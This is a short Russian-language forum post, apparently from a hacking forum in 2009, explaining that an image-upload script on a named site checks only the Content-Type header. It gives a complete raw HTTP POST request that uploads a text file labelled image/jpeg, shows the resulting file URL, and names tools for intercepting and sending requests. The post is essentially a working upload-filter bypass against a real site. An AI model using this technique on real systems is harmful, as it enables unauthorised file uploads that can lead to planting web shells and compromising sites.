25.02.2009, 10:04
|
|
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817
Репутация:
112
|
|
Все очень просто скрипт проверяет только Content-Type. Посылаем ему:
Код:
POST /upload.php HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; MRA 5.3 (build 02560); ru) Presto/2.1.1
Host: img.snakearena.net
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://img.snakearena.net/
Content-Length: 56006
Content-Type: multipart/form-data; boundary=----------ScxPmUEbYQqkJns82FC1ET
Connection: Keep-Alive
------------ScxPmUEbYQqkJns82FC1ET
Content-Disposition: form-data; name="userfile"; filename="b0.txt"
Content-Type: image/jpeg
Текст
и получаем http://img.snakearena.net/images/61372b0.txt
Чем перехватить POST? Я использую Naviscope
Чем отправить POST? Я использую InetCrack (Algol edition)
POSTBIT TEST
|
|
|